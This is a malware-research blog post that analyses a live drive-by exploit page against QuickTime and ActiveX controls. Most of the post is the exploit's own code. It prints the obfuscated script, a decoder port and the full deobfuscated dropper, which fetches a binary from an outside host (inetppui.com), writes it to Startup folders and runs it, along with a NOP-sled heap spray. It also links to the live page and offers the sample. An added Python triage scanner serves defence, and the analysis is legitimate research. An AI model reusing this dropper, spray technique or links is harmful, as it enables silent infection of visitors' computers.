Here is an example of an exploit page. It checks the visitor's computer for certain vulnerable QuickTime browser objects; if one is found, it exploits the object, injects the malware onto the computer and executes it. We recorded a video of the website exploiting QuickTime and installing the malware on the system (at the bottom of the post). This binary is available in /pnuemo-malware/ in our repository. See the FAQ for access. As usual, proceed at your own risk, because the links are still live as of this post's date. One thing I will mention: when you visit the site it logs your IP address, so on subsequent visits you'll get a 404.
This post is very long because of the code within the page, so to read everything, make sure to read more.
hxxp://inetppui.com/html/2440/f8ae8aedaf494548b681dedb37dd3d5f/
<script language=JavaScript>
// f1(): custom 6-bit decoder (64-character alphabet in t[]), output bytes XOR 0xe7, written to the document in 1 KB blocks
function f1(z0){var i,j,ff=0xff,z9=0xc,b=0x400,
r,z7=3,s=0,z8="ss",w=0,p=0,t=Array(63,62,58,34,3,30,47,43,40,6,0,0,0,0,0,
0,21,24,39,60,22,29,25,15,17,26,33,46,4,11,7,54,10,53,1,2,36,14,18,55,51,5,
16,0,0,0,0,27,0,61,59,8,48,37,9,0,19,13,41,31,23,20,57,44,52,28,38,42,32,50,
45,12,56,49,35);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j--){r="";for(i=
Math.min(l,b);i>0;l--,i--){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;
if(s){z4=0xe7^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8="7";z9=w}}y1="document";y2="write";eval(y1+"."+y2+"(r)")}}
y6="()";eval(y3);</script>
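The f1() decoder above is a custom base64 variant. As an added example (my code, not code from the page), here is a Python port of it together with the inverse encoder, so an analyst can see exactly what the scheme is and generate test inputs; the table is the script's own t[] array, and the sample plaintext is constructed.

```python
# Port of the f1() decoder from the script above; the table is the script's own t[] array.
# Added example, not code from the original page.

# t[] is indexed by (charCode - 48), so it covers '0' (48) through 'z' (122).
TABLE = [63, 62, 58, 34, 3, 30, 47, 43, 40, 6, 0, 0, 0, 0, 0,
         0, 21, 24, 39, 60, 22, 29, 25, 15, 17, 26, 33, 46, 4, 11, 7, 54, 10, 53, 1, 2, 36, 14, 18, 55, 51, 5,
         16, 0, 0, 0, 0, 27, 0, 61, 59, 8, 48, 37, 9, 0, 19, 13, 41, 31, 23, 20, 57, 44, 52, 28, 38, 42, 32, 50,
         45, 12, 56, 49, 35]
XOR_KEY = 0xE7

# The 64-character alphabet actually used: digits, '@', A-Z, '_', a-z. Other TABLE slots are
# 0 fillers for characters that never occur; 'g' is the one alphabet character that maps to 0.
ALPHABET = "0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
CHAR_TO_VAL = {c: TABLE[ord(c) - 48] for c in ALPHABET}
VAL_TO_CHAR = {v: c for c, v in CHAR_TO_VAL.items()}
assert len(VAL_TO_CHAR) == 64, "table must be a permutation of 0..63"


def f1_decode(text):
    """Each character contributes 6 bits, packed little-endian (first character = lowest
    bits); every completed byte is emitted XOR 0xE7. Four characters give three bytes."""
    out = bytearray()
    w = 0  # bit accumulator, the script's w
    s = 0  # shift for the next 6-bit group, the script's s
    for ch in text:
        w |= CHAR_TO_VAL[ch] << s  # KeyError on a character outside the alphabet
        if s:
            out.append((w ^ XOR_KEY) & 0xFF)
            w >>= 8
            s -= 2
        else:
            s = 6
    return bytes(out)


def f1_encode(data):
    """Inverse of f1_decode(): XOR each byte with 0xE7, pack up to 3 bytes into 24 bits
    little-endian and emit 6-bit groups from the low end (2/3/4 characters per 1/2/3 bytes)."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        val = 0
        for j, b in enumerate(chunk):
            val |= (b ^ XOR_KEY) << (8 * j)
        for k in range(len(chunk) + 1):
            out.append(VAL_TO_CHAR[(val >> (6 * k)) & 0x3F])
    return "".join(out)


def roundtrip(plain):
    """Encode then decode; returns (encoded text, recovered bytes)."""
    encoded = f1_encode(plain)
    return encoded, f1_decode(encoded)


if __name__ == "__main__":
    # Constructed sample plaintext, not the real payload.
    enc, dec = roundtrip(b"document.write('<h1>decoded</h1>')")
    print(enc, dec)
```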
THIS DEOBFUSCATES TO THE FOLLOWING:
// Only if the VBScript probe found QuickTime: write an <object> for the QuickTime ActiveX control (CLSID 02BF25D5-8C17-4B23-BC80-D3488ABDDC6B) that autoplays qt.mov
if (haveqt) {
var obj2mk="document."+tobjst2+"write"+tobjst2+"('<"+tobjst2+"object"+tobjst2+" CLASSID"+tobjst2+"=\"clsid:"+tobjst2+"02BF25D5-8C17"+tobjst2+"-4B23-BC80-"+tobjst2+"D3488ABDDC6B\" width=\"100\" height=\"30\" style=\"border:0px\"><param name=\"src\" value=\"q"+tobjst2+"t.mov\"><param name=\"auto"+tobjst2+"play\" value=\"true\"><param name=\"loop\" value=\"false\"><param name=\"controller\" value=\"true\"></"+tobjst2+"object>');";
eval(obj2mk);
};</SCRIPT>
<SCRIPT Language="javascript">
var space="";
var aue='%ue';
function lsrn(pt31) {
var ldob=null; var tds1=17; var st2="2"; var stms="Microsoft";
var stmss="MS"; var stxml="XML"; var stdt="."; var stht="HTTP"; var stsrv="Server";
var url="http://inetppui.com/files/2440/f8ae8aedaf494548b681dedb37dd3d5f/";
var tds2=17; var stgt="GET"; var std="D"; var stbd="Body"; var strsp="response";
var ev1="ldob"+stdt+"open(stgt,url,false);"; var stsv="Save";
// Obtain an XMLHTTP object (Microsoft.XMLHTTP, MSXML2.XMLHTTP, MSXML2.ServerXMLHTTP, then the native XMLHttpRequest) and open a GET to the payload URL
try { ldob=objmker(pt31, stms+stdt+stxml+stht); eval(ev1); } catch(e) { try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stxml+stht); eval(ev1); } catch(e) { try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stsrv+stxml+stht); eval(ev1); } catch(e) { try { ldob=new XMLHttpRequest(); eval(ev1); } catch(e){ return 0; };};};};
try { ldob.send(null); } catch(e) { try { ldob.send(null); } catch(e) { return 0; };};
eval("ld"+stbd+"=ldob."+strsp+stbd);   // ldBody=ldob.responseBody
var obj_strm=objmker(pt31, "A"+std+"O"+std+"B.Stream");   // ADODB.Stream
if (obj_strm) {
obj_strm.Type=1; obj_strm.Mode=3; obj_strm.Open(); obj_strm.Write(ldBody);
var hdrv=""; var dtemp=""; var dstart=""; var daustart="";
try {var obj_WScript=objmker(pt31, "WScript.Shell");
try{var wshProcEnv=obj_WScript.Environment("PROCESS"); hdrv=wshProcEnv("HOMEDRIVE");
dtemp=wshProcEnv("TEMP");}catch(e){};
try{dstart=obj_WScript.SpecialFolders("Startup"); daustart=obj_WScript.SpecialFolders("AllUsersStartup");
}catch(e){}; }catch(e){};
if (hdrv=="") { hdrv="C:"; };
if (dtemp=="") { try { var obj_fso=objmker(pt31, "Scripting.FileSystemObject");
dtemp=obj_fso.GetSpecialFolder(2);}catch(e){};};
var fn2=""; var fn=""; var stds="\\Documents and Settings\\"; var stau="All Users\\";
var stfln="\\msupd_0809_upd070148.exe";
var strnd=Math.round(Math.random()*(100000-1)+10000);
var ev2="obj_strm."+stsv+"ToFile(fn,"+st2+");fn2=fn;";   // obj_strm.SaveToFile(fn,2)
// Write the binary into a Startup folder (All Users first, then the current user); the hard-coded paths below cover localized Windows installs
if(fn2==""){if(daustart!=""){try{Tv=daustart;fn=Tv+stfln;eval(ev2);}catch(e){};};};
if(fn2==""){if(dstart!=""){try{Tv=dstart;fn=Tv+stfln;eval(ev2);}catch(e){};};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Inicio\\Programas\\Inicio"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menuen Start\\Programmer\\Start"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programma\\'s\\Opstarten"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programy\\Autostart"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Avvio\\Programmi\\Esecuzione automatica"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Kaynnista-valikko\\Ohjelmat\\Kaynnistys"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start Menu\\Programlar\\BASLANGIC"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-meny\\Programmer\\Oppstart"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-menyn\\Program\\Autostart"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Iniciar\\Programas\\Iniciar"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+"\\Dokumente und Einstellungen\\"+stau+"Startmenu\\Programme\\Autostart"+stfln;eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start Menu\\Programs\\Startup"+stfln;eval(ev2);}catch(e){};};
// Fallbacks when no Startup folder is writable: TEMP, the drive root and the recycle bin folders
if(fn2==""){try{Tv=dtemp;fn=Tv+"\\tmp"+strnd+".exe";eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+"\\sys"+strnd+".exe";eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+"\\RECYCLER\\"+strnd+".exe";eval(ev2);}catch(e){};};
if(fn2==""){try{Tv=hdrv;fn=Tv+"\\RECYCLED\\"+strnd+".exe";eval(ev2);}catch(e){};};
// Run the dropped file: Shell.Application, then WScript.Shell, then an <object> tag whose codebase points at the file
if (fn2!=""){try{var obj_shl=objmker(pt31,"Shell.Application");obj_shl.ShellExecute(fn2);}catch(e){try
{obj_WScript.Exec(fn2);}catch(e){try{var tobjst=space;
var obj2mk="demoobj"+tobjst+".innerHTML"+tobjst+"=demoobj"+tobjst+".innerHTML"+tobjst+"+\"<object"+tobjst+" classid"+tobjst+"='clsid:"+tobjst+"527196a4-b1a3-4647-931d-37ba5af23037"+tobjst+"' codebase="+tobjst+"'\"+fn2+\"'></"+tobjst+"object>\";";eval(obj2mk);}catch(e){return 0;};};};return 1;}else{return 0;};
}else{return 0;};
};
function objmker(pt21,pt22) {
var tds=27; var nobj=null; var stno="nobj=pt21.";
// Instantiate the ProgID pt22 through the host ActiveX control pt21, trying CreateObject and GetObject with several signatures
try{eval(stno+'CreateObject(pt22)');}catch(e){}
if(!nobj){try{eval(stno+'CreateObject(pt22,"")');}catch(e){}}
if(!nobj){try{eval(stno+'CreateObject(pt22,"","")');}catch(e){}}
if(!nobj){try{eval(stno+'GetObject("",pt22)');}catch(e){}}
if(!nobj){try{eval(stno+'GetObject(pt22,"")');}catch(e){}}
if(!nobj){try{eval(stno+'GetObject(pt22)');}catch(e){}}
return(nobj);
}
var tds=17; var i=0; var stcb1="-0000-0000-C000-000000000046"; var st1m="1-"; var stm1="-1";
// CLSIDs of ActiveX controls tried in turn as the host object for lsrn(); the string splitting hides the full CLSIDs from signature scanners
var hncx=new Array("BD96C556-65A3"+stm1+"1D0-983A-00C04FC29E36","AB9BCEDD-EC7E-47E"+st1m+"9322-D4A210617116","0006F033"+stcb1,"0006F03A"+stcb1,"6E32070A-766D-4EE6-879C-DC1FA91D2FC3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-433"+st1m+"8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F"+stm1+"B2D-483"+st1m+"A9FD-874847682010","BA018599"+stm1+"DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F"+st1m+"B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
var stob="object"; var stid="id"; var strd="obj_RDS"; var iuump=null;
while (hncx[i]) {
iuump=null;iuump=document.createElement(stob);iuump.setAttribute(stid,strd+i);iuump.setAttribute("class"+stid,"cls"+stid+":"+hncx[i]);
if(iuump){try{if(lsrn(iuump)){break;};}catch(e){};}; i++;}
// Heap spray: 47 blocks of just under 4 MB (0x400000) each, a NOP sled followed by the shellcode.
// shsb is the %u-encoded shellcode string; its last words spell out the same download URL as lsrn()'s url variable
var shs=unescape(shsb);
var noplen = 0x400000-(shs.length*2+0x38);
var nops4m=unescape("%u9090"); while (nops4m.length*2<noplen) nops4m+=nops4m; nops4m=nops4m.substring(0,noplen/2);
arr188m=new Array(); for(i=0;i<47;i++){arr188m[i]=nops4m+shs;};
// VBScript probe for the QuickTime ActiveX control; it sets haveqt, which the first script checks before writing the <object> tag
var tobjst2=space;var haveqt=false;
var chkqt=' <sc'+'ript language="VB'+'script"> \n On Error Resume Next \n Set theObject=CreateObject("QuickTimeCheckObject.QuickTimeCheck.1") \n On Error goto 0 \n If IsObject(theObject) Then \n If theObject.IsQuickTimeAvailable(0) Then \'Just check for file\' \n haveqt=1 \n End If \n End If \n </scr' + 'ipt> \n';
var obj1mk="document."+tobjst2+"writeln"+tobjst2+"(chkqt);";eval(obj1mk);
This exploits the computer and creates the file 'c:\documents and settings\all users\msupd_0809_upd070148.exe' on it, downloaded from 'hxxp://inetppui.com/files/2440/f8ae8aedaf494548b681dedb37dd3d5f/'.
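As an added triage example (my code, not from the page or the exploit kit), here is a Python script that statically scans a page for the traits the deobfuscated code above shows: `%u`-escaped shellcode literals decoded the way `unescape()` would (to pull out the download URL), the self-doubling `%u9090` spray loop with its 0x400000 x 47 size, `clsid:` values set on created objects, and the ADODB/WScript ProgIDs used to save and run the drop. It runs on a constructed cut-down sample that mirrors this page's script; resolving string-splitting tricks like the `aue` and `tobjst2` variables needs a JavaScript evaluator and is out of scope here.

```python
import re

# Constructed sample, not the page's script: a cut-down page that keeps the traits of the
# deobfuscated exploit above. Its "shellcode" is a NOP marker, two filler bytes and a fake URL.
SAMPLE_PAGE = '''<script>
var shsb="%u9090%u9090%u0feb%u7468%u7074%u2f3a%u652f%u6178%u706d%u656c%u692e%u766e%u6c61%u6469%u782f%u0000";
var shs=unescape(shsb);
var noplen = 0x400000-(shs.length*2+0x38);
var nops4m=unescape("%u9090"); while (nops4m.length*2<noplen) nops4m+=nops4m;
arr188m=new Array(); for(i=0;i<47;i++){arr188m[i]=nops4m+shs;};
var o=document.createElement("object");
o.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var strm=o.CreateObject("ADODB.Stream"); strm.SaveToFile(fn,2);
</script>'''

ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
CLSID_RE = re.compile(r"clsid:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.I)
# ProgIDs the deobfuscated page uses to fetch, write, locate and run the dropped binary.
DROPPER_PROGIDS = ("ADODB.Stream", "WScript.Shell", "Shell.Application",
                   "Scripting.FileSystemObject", "Microsoft.XMLHTTP", "MSXML2.XMLHTTP",
                   "MSXML2.ServerXMLHTTP", "QuickTimeCheckObject.QuickTimeCheck.1")


def unescape_to_bytes(text):
    """Like JavaScript unescape(): %uXXXX is a UTF-16 unit stored little-endian, %XX one byte."""
    out = bytearray()
    for word, byte in ESCAPE_RE.findall(text):
        out += int(word, 16).to_bytes(2, "little") if word else bytes([int(byte, 16)])
    return bytes(out)


def printable_strings(data, min_len=6):
    """Printable ASCII runs; a download URL at the tail of shellcode shows up here."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def spray_estimate_mb(page):
    """Block size times block count for the 0x...-( ... ) / for-loop spray shape, else None."""
    size = re.search(r"0x([0-9a-fA-F]+)\s*-\s*\(", page)
    count = re.search(r"for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(\d+)", page)
    if not (size and count):
        return None
    return int(size.group(1), 16) * int(count.group(1)) / (1024 * 1024)


def triage(page):
    """Static triage: URLs hidden in %u literals, spray indicators, CLSIDs and dropper ProgIDs."""
    findings = {"urls": [], "clsids": [], "progids": [], "heap_spray": False, "spray_mb": None}
    # Any double-quoted literal with at least four %u escapes is treated as a shellcode candidate.
    for literal in re.findall(r'"((?:[^"\\]|\\.)*)"', page):
        if len(re.findall(r"%u[0-9a-fA-F]{4}", literal)) >= 4:
            findings["urls"] += [s for s in printable_strings(unescape_to_bytes(literal)) if "://" in s]
    # A string that doubles itself in a loop, next to a NOP word, is the classic spray signature.
    doubling = re.search(r"(\w+)\s*\+=\s*\1\b", page)
    findings["heap_spray"] = bool(doubling and "%u9090" in page)
    findings["spray_mb"] = spray_estimate_mb(page)
    findings["clsids"] = sorted({c.upper() for c in CLSID_RE.findall(page)})
    findings["progids"] = [p for p in DROPPER_PROGIDS if p.lower() in page.lower()]
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PAGE).items():
        print(key, value)
```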
(Click picture for video of the exploit)
Download in .wmv
msupd_0809_upd070148.exe
Result: 8/36 (22.23%)
MD5: 44641bb1fc3e0443e8c2222a69af6cc9
VirusTotal
ThreatExpert Analysis


Hello!
Could you please send me the deobfuscated code to busin3ss [at] gmail [dot] com. This would be an excellent example for a PDF that I’m creating, but all the single and double quotes are messed up.
Thanks in advance!
Here is a link to the entire post in .txt format.
http://malwaredb.djpnuemo.com/quicktime.txt (Right-click and save)